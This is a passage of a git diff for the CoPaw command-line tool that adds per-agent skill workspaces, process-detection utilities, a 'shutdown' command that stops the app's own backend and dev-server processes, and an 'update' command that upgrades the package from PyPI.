force=False, ) @@ -351,14 +396,20 @@ def init_cmd( from ..agents.utils import copy_md_files config = load_config(config_path) if config_path.is_file() else Config() - current_language = config.agents.language + current_language = ( + config.agents.language or "zh" + ) # Default to "zh" if None installed_language = config.agents.installed_md_files_language if use_defaults: # --defaults: always attempt copy, skip files that already exist - # in WORKING_DIR (handles freshly mounted empty volumes). + # in default workspace (handles freshly mounted empty volumes). click.echo(f"\nChecking MD files [language: {current_language}]...") - copied = copy_md_files(current_language, skip_existing=True) + copied = copy_md_files( + current_language, + skip_existing=True, + workspace_dir=default_workspace, + ) if copied: config.agents.installed_md_files_language = current_language save_config(config, config_path) @@ -373,7 +424,10 @@ def init_cmd( click.echo( f"Language changed: {installed_language} → {current_language}", ) - copied = copy_md_files(current_language) + copied = copy_md_files( + current_language, + workspace_dir=default_workspace, + ) if copied: config.agents.installed_md_files_language = current_language save_config(config, config_path) diff --git a/src/copaw/cli/main.py b/src/copaw/cli/main.py index 04fcb9c8e..8db5014a8 100644 --- a/src/copaw/cli/main.py +++ b/src/copaw/cli/main.py @@ -101,6 +101,21 @@ def _record(label: str, elapsed: float) -> None: _record(".desktop_cmd", time.perf_counter() - _t) +_t = time.perf_counter() +from .update_cmd import update_cmd # noqa: E402 + +_record(".update_cmd", time.perf_counter() - _t) + +_t = time.perf_counter() +from .shutdown_cmd import shutdown_cmd # noqa: E402 + +_record(".shutdown_cmd", time.perf_counter() - _t) + +_t = time.perf_counter() +from .auth_cmd import auth_group # noqa: E402 + +_record(".auth_cmd", time.perf_counter() - _t) + _total = time.perf_counter() - _t0_main _init_timings.append(("(total imports)", _total)) logger.debug("%.3fs (total imports)", _total) @@ -152,3 +167,6 @@ def cli(ctx: click.Context, host: str | None, port: int | None) -> None: cli.add_command(skills_group) cli.add_command(uninstall_cmd) cli.add_command(desktop_cmd) +cli.add_command(update_cmd) +cli.add_command(shutdown_cmd) +cli.add_command(auth_group) diff --git a/src/copaw/cli/process_utils.py b/src/copaw/cli/process_utils.py new file mode 100644 index 000000000..fabbdc100 --- /dev/null +++ b/src/copaw/cli/process_utils.py @@ -0,0 +1,236 @@ +# -*- coding: utf-8 -*- +from __future__ import annotations + +import csv +import io +import json +import re +import subprocess +import sys +from typing import Optional + + +_PORT_ARG_PATTERN = re.compile(r"(?:^|\s)--port(?:=|\s+)(\d+)(?=\s|$)") + + +def _coerce_optional_int(value: object) -> Optional[int]: + """Best-effort conversion of JSON-decoded values to integers.""" + if value is None: + return None + if isinstance(value, int): + return value + if isinstance(value, str): + try: + return int(value) + except ValueError: + return None + return None + + +def _parse_windows_process_snapshot_json( + payload: str, +) -> dict[int, tuple[Optional[int], str, str]]: + """Parse PowerShell JSON process snapshot output.""" + if not payload.strip(): + return {} + + try: + data = json.loads(payload) + except json.JSONDecodeError: + return {} + + rows = data if isinstance(data, list) else [data] + snapshot: dict[int, tuple[Optional[int], str, str]] = {} + for row in rows: + if not isinstance(row, dict): + continue + + pid_value = row.get("ProcessId") + parent_value = row.get("ParentProcessId") + pid = _coerce_optional_int(pid_value) + if pid is None: + continue + + parent_pid = _coerce_optional_int(parent_value) + + name = str(row.get("Name") or "") + command = str(row.get("CommandLine") or "") + snapshot[pid] = (parent_pid, name, command) + return snapshot + + +def _parse_windows_process_snapshot_csv( + payload: str, +) -> dict[int, tuple[Optional[int], str, str]]: + """Parse WMIC CSV process snapshot output.""" + if not payload.strip(): + return {} + + snapshot: dict[int, tuple[Optional[int], str, str]] = {} + reader = csv.DictReader(io.StringIO(payload)) + for row in reader: + pid_value = (row.get("ProcessId") or "").strip() + if not pid_value.isdigit(): + continue + + parent_value = (row.get("ParentProcessId") or "").strip() + parent_pid = int(parent_value) if parent_value.isdigit() else None + pid = int(pid_value) + name = (row.get("Name") or "").strip() + command = (row.get("CommandLine") or "").strip() + snapshot[pid] = (parent_pid, name, command) + return snapshot + + +def _windows_process_snapshot() -> dict[int, tuple[Optional[int], str, str]]: + """Return Windows process info as pid -> (parent_pid, name, cmdline).""" + commands = ( + ( + [ + "powershell", + "-NoProfile", + "-Command", + ( + "Get-CimInstance Win32_Process | " + "Select-Object ProcessId,ParentProcessId,Name," + "CommandLine | ConvertTo-Json -Compress" + ), + ], + _parse_windows_process_snapshot_json, + ), + ( + [ + "wmic", + "process", + "get", + "ProcessId,ParentProcessId,Name,CommandLine", + "/FORMAT:CSV", + ], + _parse_windows_process_snapshot_csv, + ), + ) + + for command, parser in commands: + try: + result = subprocess.run( + command, + capture_output=True, + text=True, + timeout=15, + check=False, + ) + except (OSError, subprocess.TimeoutExpired): + continue + + snapshot = parser(result.stdout or "") + if snapshot: + return snapshot + return {} + + +def _process_table() -> list[tuple[int, str]]: + """Return a best-effort process table as (pid, command line).""" + if sys.platform == "win32": + return [ + (pid, command or name or "") + for pid, ( + _parent_pid, + name, + command, + ) in _windows_process_snapshot().items() + ] + + try: + result = subprocess.run( + ["ps", "-ax", "-o", "pid=", "-o", "command="], + capture_output=True, + text=True, + timeout=10, + check=False, + ) + except (OSError, subprocess.TimeoutExpired): + return [] + + rows: list[tuple[int, str]] = [] + for line in (result.stdout or "").splitlines(): + stripped = line.strip() + if not stripped: + continue + parts = stripped.split(None, 1) + if not parts or not parts[0].isdigit(): + continue + command = parts[1] if len(parts) > 1 else "" + rows.append((int(parts[0]), command)) + return rows + + +def _matches_copaw_cli_command(command: str, *subcommands: str) -> bool: + """Return whether command line looks like a CoPaw CLI invocation.""" + lowered = f" {command.lower()}" + return any( + pattern in lowered + for subcommand in subcommands + for pattern in ( + f" -m copaw {subcommand}", + f" copaw {subcommand}", + f"__main__.py {subcommand}", + f'copaw.exe" {subcommand}', + f"copaw.exe {subcommand}", + ) + ) + + +def _is_copaw_service_command(command: str) -> bool: + """Return whether the command line looks like a local CoPaw app.""" + return _matches_copaw_cli_command(command, "app") + + +def _is_copaw_wrapper_process(name: str, command: str) -> bool: + """Return whether the process looks like a CoPaw CLI wrapper.""" + lowered_name = name.lower().removesuffix(".exe") + return lowered_name == "copaw" or _matches_copaw_cli_command( + command, + "app", + "desktop", + ) + + +def _extract_port_from_command(command: str, default: int = 8088) -> int: + """Extract `--port` from a command line when present.""" + match = _PORT_ARG_PATTERN.search(command) + return int(match.group(1)) if match else default + + +def _base_url(host: str, port: int) -> str: + """Build a base URL from host and port.""" + normalized_host = host.strip() + if ":" in normalized_host and not normalized_host.startswith("["): + normalized_host = f"[{normalized_host}]" + return f"http://{normalized_host}:{port}" + + +def _candidate_hosts(host: str | None) -> list[str]: + """Return host variants that can reach a local CoPaw service.""" + if not host: + return [] + + normalized = host.strip() + lowered = normalized.lower().strip("[]") + candidates: list[str] = [] + + def _add(value: str) -> None: + if value and value not in candidates: + candidates.append(value) + + if lowered in {"0.0.0.0", "::"}: + _add("127.0.0.1") + _add("localhost") + if lowered == "::": + _add("::1") + elif lowered == "localhost": + _add("localhost") + _add("127.0.0.1") + _add("::1") + + _add(normalized) + return candidates diff --git a/src/copaw/cli/providers_cmd.py b/src/copaw/cli/providers_cmd.py index ef72d0ed9..85ee03710 100644 --- a/src/copaw/cli/providers_cmd.py +++ b/src/copaw/cli/providers_cmd.py @@ -60,7 +60,7 @@ def _get_ollama_host() -> str: manager = _manager() provider = manager.get_provider("ollama") if provider is None or not provider.base_url: - return "http://localhost:11434" + return "http://127.0.0.1:11434" return provider.base_url diff --git a/src/copaw/cli/shutdown_cmd.py b/src/copaw/cli/shutdown_cmd.py new file mode 100644 index 000000000..127cbdda3 --- /dev/null +++ b/src/copaw/cli/shutdown_cmd.py @@ -0,0 +1,382 @@ +# -*- coding: utf-8 -*- +from __future__ import annotations + +import os +import signal +import subprocess +import sys +import time +from pathlib import Path +from typing import Optional + +import click + +from .process_utils import ( + _is_copaw_wrapper_process, + _process_table, + _windows_process_snapshot, +) + + +_PROJECT_ROOT = Path(__file__).resolve().parents[3] +_CONSOLE_DIR = (_PROJECT_ROOT / "console").resolve() +_SIGTERM = signal.SIGTERM +_SIGKILL = getattr(signal, "SIGKILL", _SIGTERM) + + +def _backend_port(ctx: click.Context, port: Optional[int]) -> int: + """Resolve backend port from explicit option or global CLI context.""" + if port is not None: + return port + return int((ctx.obj or {}).get("port", 8088)) + + +def _listening_pids_for_port(port: int) -> set[int]: + """Return PIDs currently listening on the given TCP port.""" + if sys.platform == "win32": + try: + result = subprocess.run( + ["netstat", "-ano", "-p", "tcp"], + capture_output=True, + text=True, + timeout=10, + check=False, + ) + except (OSError, subprocess.TimeoutExpired): + return set() + + pids: set[int] = set() + suffix = f":{port}" + for line in (result.stdout or "").splitlines(): + parts = line.split() + if len(parts) < 5: + continue + local_addr = parts[1] + state = parts[3].upper() + if not local_addr.endswith(suffix) or state != "LISTENING": + continue + try: + pids.add(int(parts[4])) + except ValueError: + continue + return pids + + commands = ( + ["lsof", "-nP", f"-iTCP:{port}", "-sTCP:LISTEN", "-t"], + ["fuser", f"{port}/tcp"], + ) + for command in commands: + try: + result = subprocess.run( + command, + capture_output=True, + text=True, + timeout=10, + check=False, + ) + except (OSError, subprocess.TimeoutExpired): + continue + + pids = { + int(token) + for token in (result.stdout or "").split() + if token.isdigit() + } + if pids: + return pids + return set() + + +def _find_frontend_dev_pids() -> set[int]: + """Find Vite dev-server processes for this repository's console app.""" + console_dir = str(_CONSOLE_DIR).lower() + matches: set[int] = set() + for pid, command in _process_table(): + lowered = command.lower() + if "vite" in lowered and console_dir in lowered: + matches.add(pid) + continue + if "copaw-console" in lowered and ( + "npm" in lowered + or "pnpm" in lowered + or "yarn" in lowered + or "node" in lowered + ): + matches.add(pid) + return matches + + +def _find_desktop_wrapper_pids() -> set[int]: + """Find `copaw desktop` wrapper processes for this project.""" + matches: set[int] = set() + patterns = ( + " -m copaw desktop", + " copaw desktop", + "__main__.py desktop", + ) + for pid, command in _process_table(): + lowered = f" {command.lower()}" + if any(pattern in lowered for pattern in patterns): + matches.add(pid) + return matches + + +def _find_windows_wrapper_ancestor_pids(pids: set[int]) -> set[int]: + """Find CoPaw wrapper/supervisor ancestors for Windows backend PIDs.""" + if sys.platform != "win32" or not pids: + return set() + + snapshot = _windows_process_snapshot() + matches: set[int] = set() + for pid in pids: + visited: set[int] = set() + current_pid = pid + while True: + info = snapshot.get(current_pid) + if info is None: + break + + parent_pid = info[0] + if parent_pid in (None, 0) or parent_pid in visited: + break + visited.add(parent_pid) + + parent_info = snapshot.get(parent_pid) + if parent_info is None: + break + + if _is_copaw_wrapper_process(parent_info[1], parent_info[2]): + matches.add(parent_pid) + + current_pid = parent_pid + return matches + + +def _child_pids_unix(pid: int) -> set[int]: + """Recursively collect child PIDs for Unix-like systems.""" + children: set[int] = set() + stack = [pid] + while stack: + current = stack.pop() + try: + result = subprocess.run( + ["pgrep", "-P", str(current)], + capture_output=True, + text=True, + timeout=5, + check=False, + ) + except (OSError, subprocess.TimeoutExpired): + continue + for token in (result.stdout or "").split(): + if not token.isdigit(): + continue + child = int(token) + if child in children: + continue + children.add(child) + stack.append(child) + return children + + +def _pid_exists(pid: int) -> bool: + """Return whether the PID still exists.""" + if pid <= 0: + return False + if sys.platform == "win32": + return pid in _windows_process_snapshot() + try: + os.kill(pid, 0) + except OSError: + return False + return True + + +def _wait_for_pid_exit( + pid: int, + timeout_sec: float, + interval_sec: float, +) -> bool: + """Wait until a PID exits within the given timeout.""" + deadline = time.monotonic() + timeout_sec + while time.monotonic() < deadline: + if not _pid_exists(pid): + return True + time.sleep(interval_sec) + return not _pid_exists(pid) + + +def _signal_process_tree_unix(pid: int, sig: signal.Signals) -> None: + """Send a signal to a Unix process and its descendants.""" + descendants = sorted(_child_pids_unix(pid), reverse=True) + for child_pid in descendants: + try: + os.kill(child_pid, sig) + except OSError: + continue + try: + os.kill(pid, sig) + except OSError: + pass + + +def _terminate_process_tree_windows(pid: int, force: bool = False) -> None: + """Terminate a Windows process tree.""" + command = ["taskkill", "/T", "/PID", str(pid)] + if force: + command.insert(1, "/F") + try: + subprocess.run( + command, + capture_output=True, + text=True, + timeout=10, + check=False, + ) + except (OSError, subprocess.TimeoutExpired): + pass + + +def _force_terminate_windows_process(pid: int) -> None: + """Force terminate a Windows process as a fallback.""" + commands = ( + [ + "powershell", + "-NoProfile", + "-Command", + ( + "$ErrorActionPreference='SilentlyContinue'; " + f"Stop-Process -Id {pid} -Force" + ), + ], + ["taskkill", "/F", "/PID", str(pid)], + ) + for command in commands: + try: + subprocess.run( + command, + capture_output=True, + text=True, + timeout=10, + check=False, + ) + except (OSError, subprocess.TimeoutExpired): + continue + + +def _terminate_pid(pid: int, timeout_sec: float = 5.0) -> bool: + """Terminate a process tree gracefully, then force kill if needed.""" + if not _pid_exists(pid): + return True + + if sys.platform == "win32": + _terminate_process_tree_windows(pid) + else: + _signal_process_tree_unix(pid, _SIGTERM) + + if _wait_for_pid_exit(pid, timeout_sec, 0.2): + return True + + if sys.platform == "win32": + _terminate_process_tree_windows(pid, force=True) + if _wait_for_pid_exit(pid, 2.0, 0.1): + return True + _force_terminate_windows_process(pid) + else: + _signal_process_tree_unix(pid, _SIGKILL) + + return _wait_for_pid_exit(pid, 2.0, 0.1) + + +def _stop_pid_set(pids: set[int]) -> tuple[list[int], list[int]]: + """Stop a set of PIDs and return (stopped, failed).""" + stopped: list[int] = [] + failed: list[int] = [] + for pid in sorted(pids): + if _terminate_pid(pid): + stopped.append(pid) + else: + failed.append(pid) + return stopped, failed + + +@click.command("shutdown", help="Force stop the running CoPaw app processes.") +@click.option( + "--port", + default=None, + type=int, + help="Backend port to stop. Defaults to global --port from config.", +) +@click.pass_context +def shutdown_cmd(ctx: click.Context, port: Optional[int]) -> None: + """Stop the running CoPaw app processes. + + `copaw app` only starts the backend process. The web console is normally + static files served by that backend. During frontend development, a + separate Vite process may also be running from the repository's + `console/` directory, and this command will stop that as well. + """ + backend_port = _backend_port(ctx, port) + backend_pids = _listening_pids_for_port(backend_port) + frontend_pids = _find_frontend_dev_pids() + desktop_pids = _find_desktop_wrapper_pids() + wrapper_pids = _find_windows_wrapper_ancestor_pids(backend_pids) + + # Build a process table for logging. + proc_table = dict(_process_table()) + + def log_pid_set(title, pids): + if not pids: + click.echo(f"{title}: nothing to stop") + return + click.echo(f"{title} ({len(pids)} total):") + for pid in sorted(pids): + cmd = proc_table.get(pid, "") + click.echo(f" PID {pid}: {cmd}") + + log_pid_set("Backend listener processes", backend_pids) + log_pid_set("Frontend development processes", frontend_pids) + log_pid_set("Desktop wrapper processes", desktop_pids) + log_pid_set("Related wrapper processes", wrapper_pids) + + all_targets = backend_pids | frontend_pids | desktop_pids | wrapper_pids + if not all_targets: + raise click.ClickException( + "No running CoPaw backend/frontend process was found.", + ) + + wrapper_stopped, wrapper_failed = _stop_pid_set(wrapper_pids) + frontend_stopped, frontend_failed = _stop_pid_set(frontend_pids) + desktop_stopped, desktop_failed = _stop_pid_set( + desktop_pids - set(wrapper_stopped) - set(frontend_stopped), + ) + backend_stopped, backend_failed = _stop_pid_set( + backend_pids + - set(wrapper_stopped) + - set(frontend_stopped) + - set(desktop_stopped), + ) + + stopped = ( + wrapper_stopped + frontend_stopped + desktop_stopped + backend_stopped + ) + failed = list( + set( + wrapper_failed + frontend_failed + desktop_failed + backend_failed, + ), + ) + + if stopped: + click.echo( + "Stopped CoPaw processes: " + + ", ".join(str(pid) for pid in sorted(stopped)), + ) + if failed: + click.echo("Failed to stop the following processes:") + for pid in sorted(failed): + cmd = proc_table.get(pid, "") + click.echo(f" PID {pid}: {cmd}") + raise click.ClickException( + "Failed to shutdown process(es): " + + ", ".join(str(pid) for pid in sorted(failed)), + ) diff --git a/src/copaw/cli/skills_cmd.py b/src/copaw/cli/skills_cmd.py index 4c4e15eb1..5a6221302 100644 --- a/src/copaw/cli/skills_cmd.py +++ b/src/copaw/cli/skills_cmd.py @@ -2,21 +2,47 @@ """CLI skill: list and interactively enable/disable skills.""" from __future__ import annotations +from pathlib import Path + import click from ..agents.skills_manager import SkillService, list_available_skills +from ..constant import WORKING_DIR +from ..config import load_config from .utils import prompt_checkbox, prompt_confirm +def _get_agent_workspace(agent_id: str) -> Path: + """Get agent workspace directory.""" + try: + config = load_config() + if agent_id in config.agents.profiles: + ref = config.agents.profiles[agent_id] + workspace_dir = Path(ref.workspace_dir).expanduser() + return workspace_dir + except Exception: + pass + return WORKING_DIR + + # pylint: disable=too-many-branches -def configure_skills_interactive() -> None: +def configure_skills_interactive( + agent_id: str = "default", + working_dir: Path | None = None, +) -> None: """Interactively select which skills to enable (multi-select).""" - all_skills = SkillService.list_all_skills() + if working_dir is None: + working_dir = _get_agent_workspace(agent_id) + + click.echo(f"Configuring skills for agent: {agent_id}\n") + + skill_service = SkillService(working_dir) + all_skills = skill_service.list_all_skills() if not all_skills: click.echo("No skills found. Nothing to configure.") return - available = set(list_available_skills()) + available = set(list_available_skills(working_dir)) all_names = {s.name for s in all_skills} # Default to all skills if nothing is currently active (first time) @@ -78,7 +104,7 @@ def configure_skills_interactive() -> None: # Apply changes for name in to_enable: - result = SkillService.enable_skill(name) + result = skill_service.enable_skill(name) if result: click.echo(f" ✓ Enabled: {name}") else: @@ -87,7 +113,7 @@ def configure_skills_interactive() -> None: ) for name in to_disable: - result = SkillService.disable_skill(name) + result = skill_service.disable_skill(name) if result: click.echo(f" ✓ Disabled: {name}") else: @@ -104,10 +130,20 @@ def skills_group() -> None: @skills_group.command("list") -def list_cmd() -> None: +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) +def list_cmd(agent_id: str) -> None: """Show all skills and their enabled/disabled status.""" - all_skills = SkillService.list_all_skills() - available = set(list_available_skills()) + working_dir = _get_agent_workspace(agent_id) + + click.echo(f"Skills for agent: {agent_id}\n") + + skill_service = SkillService(working_dir) + all_skills = skill_service.list_all_skills() + available = set(list_available_skills(working_dir)) if not all_skills: click.echo("No skills found.") @@ -135,5 +171,11 @@ def list_cmd() -> None: @skills_group.command("config") -def configure_cmd() -> None: - configure_skills_interactive() +@click.option( + "--agent-id", + default="default", + help="Agent ID (defaults to 'default')", +) +def configure_cmd(agent_id: str) -> None: + """Interactively configure skills.""" + configure_skills_interactive(agent_id=agent_id) diff --git a/src/copaw/cli/update_cmd.py b/src/copaw/cli/update_cmd.py new file mode 100644 index 000000000..c53d2881b --- /dev/null +++ b/src/copaw/cli/update_cmd.py @@ -0,0 +1,729 @@ +# -*- coding: utf-8 -*- +from __future__ import annotations + +import json +import os +import signal +import shutil +import subprocess +import sys +import time +from dataclasses import asdict, dataclass +from importlib import metadata +from pathlib import Path +from typing import Any +from urllib.parse import urlparse + +import click +import httpx +from packaging.version import InvalidVersion, Version + +from ..__version__ import __version__ +from ..constant import WORKING_DIR +from ..config.utils import read_last_api +from .process_utils import ( + _base_url, + _candidate_hosts, + _extract_port_from_command, + _is_copaw_service_command, + _process_table, +) + +_PYPI_JSON_URL = "https://pypi.org/pypi/copaw/json" + + +def _subprocess_text_kwargs() -> dict[str, Any]: + """Return robust text-decoding settings for subprocess output. + + Package installers may emit UTF-8 regardless of the active Windows code + page. Using replacement for undecodable bytes prevents the update worker + from crashing while streaming output. + """ + return { + "text": True, + "encoding": "utf-8", + "errors": "replace", + } + + +@dataclass(frozen=True) +class InstallInfo: + """Information about the current CoPaw installation.""" + + package_dir: str + python_executable: str + environment_root: str + environment_kind: str + installer: str + source_type: str + source_url: str | None = None + + +@dataclass(frozen=True) +class RunningServiceInfo: + """Detected CoPaw service endpoint state.""" + + is_running: bool + base_url: str | None = None + version: str | None = None + + +def _version_obj(version: str) -> Any: + """Parse version when possible; otherwise keep the raw string.""" + try: + return Version(version) + except InvalidVersion: + return version + + +def _is_newer_version(latest: str, current: str) -> bool | None: + """Return whether latest is newer than current. + + Returns `None` when either version cannot be compared reliably. + """ + parsed_latest = _version_obj(latest) + parsed_current = _version_obj(current) + if isinstance(parsed_latest, str) or isinstance(parsed_current, str): + if latest == current: + return False + return None + return parsed_latest > parsed_current + + +def _fetch_latest_version() -> str: + """Fetch the latest published CoPaw version from PyPI.""" + try: + resp = httpx.get( + _PYPI_JSON_URL, + timeout=10.0, + headers={"Accept": "application/json"}, + ) + resp.raise_for_status() + data = resp.json() + except httpx.HTTPError as exc: + raise click.ClickException( + f"Failed to fetch the latest CoPaw version from PyPI: {exc}", + ) from exc + except json.JSONDecodeError as exc: + raise click.ClickException( + "Received an invalid response from PyPI when checking for the " + f"latest CoPaw version: {exc}", + ) from exc + version = str(data.get("info", {}).get("version", "")).strip() + if not version: + raise click.ClickException( + "Unable to determine the latest CoPaw version.", + ) + return version + + +def _detect_source_type( + direct_url: dict[str, Any] | None, +) -> tuple[str, str | None]: + """Classify the current installation origin.""" + if not direct_url: + return ("pypi", None) + + url = direct_url.get("url") + dir_info = direct_url.get("dir_info") or {} + if dir_info.get("editable"): + return ("editable", url) + if direct_url.get("vcs_info"): + return ("vcs", url) + if isinstance(url, str) and url.startswith("file://"): + return ("local", url) + return ("direct-url", url if isinstance(url, str) else None) + + +def _detect_installation() -> InstallInfo: + """Inspect the current Python environment and installation style.""" + dist = metadata.distribution("copaw") + # if installed through uv, installer will be `uv` + installer = (dist.read_text("INSTALLER") or "pip").strip() or "pip" + + direct_url: dict[str, Any] | None = None + direct_url_text = dist.read_text("direct_url.json") + if direct_url_text: + try: + direct_url = json.loads(direct_url_text) + except json.JSONDecodeError: + direct_url = None + + source_type, source_url = _detect_source_type(direct_url) + package_dir = Path(__file__).resolve().parent.parent + python_executable = sys.executable + environment_root = Path(sys.prefix).resolve() + environment_kind = ( + "virtualenv" if sys.prefix != sys.base_prefix else "system" + ) + + return InstallInfo( + package_dir=str(package_dir), + python_executable=str(python_executable), + environment_root=str(environment_root), + environment_kind=environment_kind, + installer=installer, + source_type=source_type, + source_url=source_url, + ) + + +def _probe_service(base_url: str) -> RunningServiceInfo: + """Probe a possible running CoPaw HTTP service.""" + try: + resp = httpx.get( + f"{base_url.rstrip('/')}/api/version", + timeout=2.0, + headers={"Accept": "application/json"}, + trust_env=False, + ) + resp.raise_for_status() + payload = resp.json() + except (httpx.HTTPError, ValueError): + return RunningServiceInfo(is_running=False) + + version = payload.get("version") if isinstance(payload, dict) else None + return RunningServiceInfo( + is_running=True, + base_url=base_url.rstrip("/"), + version=str(version) if version else None, + ) + + +def _process_candidate_ports() -> list[int]: + """Infer candidate local CoPaw service ports from running processes.""" + ports: list[int] = [] + for _pid, command in _process_table(): + if not _is_copaw_service_command(command): + continue + + port = _extract_port_from_command(command) + if port not in ports: + ports.append(port) + return ports + + +def _detect_running_service_from_processes( + preferred_hosts: list[str], +) -> RunningServiceInfo: + """Best-effort local process fallback for service detection.""" + for port in _process_candidate_ports(): + hosts = preferred_hosts or ["127.0.0.1", "localhost"] + for host in hosts: + result = _probe_service(_base_url(host, port)) + if result.is_running: + return result + + fallback_host = next(iter(hosts), "127.0.0.1") + return RunningServiceInfo( + is_running=True, + base_url=_base_url(fallback_host, port), + ) + + return RunningServiceInfo(is_running=False) + + +def _detect_running_service( + host: str | None, + port: int | None, +) -> RunningServiceInfo: + """Detect whether a CoPaw HTTP service is currently running.""" + candidates: list[str] = [] + seen: set[str] = set() + preferred_hosts: list[str] = [] + + def _remember_hosts(candidate_host: str | None) -> None: + for item in _candidate_hosts(candidate_host): + if item not in preferred_hosts: + preferred_hosts.append(item) + + def _add_candidate( + candidate_host: str | None, + candidate_port: int | None, + ) -> None: + if not candidate_host or candidate_port is None: + return + _remember_hosts(candidate_host) + for resolved_host in _candidate_hosts(candidate_host): + base_url = _base_url(resolved_host, candidate_port) + if base_url in seen: + continue + seen.add(base_url) + candidates.append(base_url) + + _add_candidate(host, port) + last = read_last_api() + if last: + _add_candidate(last[0], last[1]) + _add_candidate("127.0.0.1", 8088) + + for base_url in candidates: + result = _probe_service(base_url) + if result.is_running: + return result + + return _detect_running_service_from_processes(preferred_hosts) + + +def _running_service_display(running: RunningServiceInfo) -> str: + """Build a concise running-service description for user prompts.""" + if not running.base_url: + return "a running CoPaw service" + version_suffix = f" (version {running.version})" if running.version else "" + return f"CoPaw service at {running.base_url}{version_suffix}" + + +def _confirm_force_shutdown(running: RunningServiceInfo) -> bool: + """Ask whether `copaw shutdown` should be used before updating.""" + click.echo("") + click.secho("!" * 72, fg="yellow", bold=True) + click.secho( + "WARNING: RUNNING COPAW SERVICE DETECTED", + fg="yellow", + bold=True, + ) + click.secho("!" * 72, fg="yellow", bold=True) + click.secho( + f"Detected {_running_service_display(running)}.", + fg="yellow", + bold=True, + ) + click.secho( + "Running `copaw shutdown` will forcibly terminate the current " + "CoPaw backend/frontend processes.", + fg="red", + bold=True, + ) + click.secho( + "Active requests, background tasks, or unsaved work may be " + "interrupted immediately.", + fg="red", + bold=True, + ) + click.echo("") + return click.confirm( + "Run `copaw shutdown` now and continue with the update?", + default=False, + ) + + +def _run_shutdown_for_update( + info: InstallInfo, + running: RunningServiceInfo, +) -> None: + """Run `copaw shutdown` in the current environment before updating.""" + command = [info.python_executable, "-m", "copaw"] + parsed = urlparse(running.base_url or "") + if parsed.port is not None: + command.extend(["--port", str(parsed.port)]) + command.append("shutdown") + + click.echo("") + click.echo("Running `copaw shutdown` before updating...") + + try: + result = subprocess.run( + command, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + **_subprocess_text_kwargs(), + check=False, + ) + except OSError as exc: + raise click.ClickException( + "Failed to run `copaw shutdown`: " f"{exc}", + ) from exc + + output = (result.stdout or "").strip() + if output: + click.echo(output) + + if result.returncode != 0: + raise click.ClickException( + "`copaw shutdown` failed. Please stop the running CoPaw " + "service manually before running `copaw update`.", + ) + + +def _build_upgrade_command( + info: InstallInfo, + latest_version: str, +) -> tuple[list[str], str]: + """Build the installer command used by the detached update worker.""" + package_spec = f"copaw=={latest_version}" + installer = info.installer.lower() + if installer.startswith("uv") and shutil.which("uv"): + return ( + [ + "uv", + "pip", + "install", + "--python", + info.python_executable, + "--upgrade", + package_spec, + "--prerelease=allow", + ], + "uv pip", + ) + return ( + [ + info.python_executable, + "-m", + "pip", + "install", + "--upgrade", + package_spec, + "--disable-pip-version-check", + ], + "pip", + ) + + +def _plan_dir() -> Path: + """Directory used to persist short-lived update worker plans.""" + return WORKING_DIR / "updates" + + +def _write_worker_plan(plan: dict[str, Any]) -> Path: + """Persist a worker plan for the detached process.""" + plan_dir = _plan_dir() + plan_dir.mkdir(parents=True, exist_ok=True) + plan_path = plan_dir / f"update-{int(time.time() * 1000)}.json" + plan_path.write_text( + json.dumps(plan, ensure_ascii=False, indent=2), + encoding="utf-8", + ) + return plan_path + + +def _spawn_update_worker( + plan_path: Path, + *, + capture_output: bool = True, +) -> subprocess.Popen[str]: + """Spawn the worker that performs the actual package upgrade.""" + worker_code = ( + "from copaw.cli.update_cmd import run_update_worker; " + "import sys; " + "sys.exit(run_update_worker(sys.argv[1]))" + ) + kwargs: dict[str, Any] = {"stdin": subprocess.DEVNULL} + if capture_output: + kwargs.update( + { + "stdout": subprocess.PIPE, + "stderr": subprocess.STDOUT, + **_subprocess_text_kwargs(), + "bufsize": 1, + }, + ) + if sys.platform == "win32": + kwargs["creationflags"] = getattr( + subprocess, + "CREATE_NEW_PROCESS_GROUP", + 0, + ) + else: + kwargs["start_new_session"] = True + + return subprocess.Popen( # pylint: disable=consider-using-with + [sys.executable, "-u", "-c", worker_code, str(plan_path)], + **kwargs, + ) + + +def _terminate_update_worker(proc: subprocess.Popen[str]) -> None: + """Best-effort termination for the worker and its installer child.""" + if proc.poll() is not None: + return + + try: + if sys.platform == "win32": + ctrl_break = getattr(signal, "CTRL_BREAK_EVENT", None) + if ctrl_break is not None: + proc.send_signal(ctrl_break) + try: + proc.wait(timeout=5) + return + except subprocess.TimeoutExpired: + pass + proc.terminate() + else: + os.killpg(proc.pid, signal.SIGTERM) + except (OSError, ProcessLookupError, ValueError): + return + + try: + proc.wait(timeout=5) + except subprocess.TimeoutExpired: + try: + proc.kill() + except OSError: + return + + +def _wait_for_process_exit(pid: int | None, timeout: float = 15.0) -> None: + """Wait briefly for another process to exit before updating files.""" + if pid is None or pid <= 0: + return + + if sys.platform == "win32": + try: + import ctypes + + kernel32 = ctypes.windll.kernel32 + synchronize = 0x00100000 + wait_timeout = 0x00000102 + handle = kernel32.OpenProcess(synchronize, False, pid) + if not handle: + return + try: + result = kernel32.WaitForSingleObject( + handle, + max(0, int(timeout * 1000)), + ) + if result == wait_timeout: + time.sleep(1.0) + finally: + kernel32.CloseHandle(handle) + except (AttributeError, ImportError, OSError): + time.sleep(min(timeout, 2.0)) + return + + deadline = time.monotonic() + timeout + while time.monotonic() < deadline: + try: + os.kill(pid, 0) + except OSError: + return + time.sleep(0.1) + + +def _run_update_worker_foreground(plan_path: Path) -> int: + """Run the update worker in a child process and wait for completion.""" + try: + proc = _spawn_update_worker(plan_path) + except OSError as exc: + raise click.ClickException( + "Failed to start update worker: " f"{exc}", + ) from exc + + try: + with proc: + if proc.stdout is not None: + for line in proc.stdout: + click.echo(line.rstrip()) + return proc.wait() + except KeyboardInterrupt: + click.echo("") + click.echo("[copaw] Update interrupted. Stopping installer...") + _terminate_update_worker(proc) + return 130 + + +def _run_update_worker_detached(plan_path: Path) -> None: + """Launch the update worker and return immediately.""" + try: + _spawn_update_worker(plan_path, capture_output=False) + except OSError as exc: + raise click.ClickException( + "Failed to start update worker: " f"{exc}", + ) from exc + + +def _load_worker_plan(plan_path: str | Path) -> dict[str, Any]: + """Load a persisted worker plan.""" + return json.loads(Path(plan_path).read_text(encoding="utf-8")) + + +def run_update_worker(plan_path: str | Path) -> int: + """Run the update worker and stream installer output.""" + path = Path(plan_path) + plan = _load_worker_plan(path) + command = [str(part) for part in plan["command"]] + + _wait_for_process_exit(plan.get("launcher_pid")) + 